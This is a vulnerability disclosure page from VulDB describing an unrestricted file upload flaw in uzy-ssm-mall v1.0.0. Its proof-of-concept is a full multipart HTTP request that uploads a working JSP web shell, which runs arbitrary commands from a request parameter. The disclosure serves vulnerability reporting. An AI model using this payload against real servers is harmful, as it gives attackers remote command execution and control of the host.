Submeter #549259: ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Uploadinformação

Títuloghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload
DescriçãoVulnerability Description In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges. Vulnerability Location The vulnerability is located at the /mall/user/uploadUserHeadImage interface. Code Audit Process Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file, which provides further convenience for attackers to exploit. Code Analysis: The code calls getUserId in multiple places to obtain the user's userid and uses userid for related CRUD operations. appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability. POC: POST /mall/user/uploadUserHeadImage HTTP/1.1 Host: target-ip Cookie: [users'Cookie] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { out.println(line); } %> ------WebKitFormBoundary7MA4YWxkTrZu0gW--
Fonte⚠️ https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4
Utilizador
 XingYue_Mstir (UID 72225)
Submissão02/04/2025 11h54 (há 1 Ano)
Moderação14/04/2025 00h36 (12 days later)
EstadoAceite
Entrada VulDB304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage Ficheiro Elevação de Privilégios]
Pontos20

VoltarVisão GeralPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!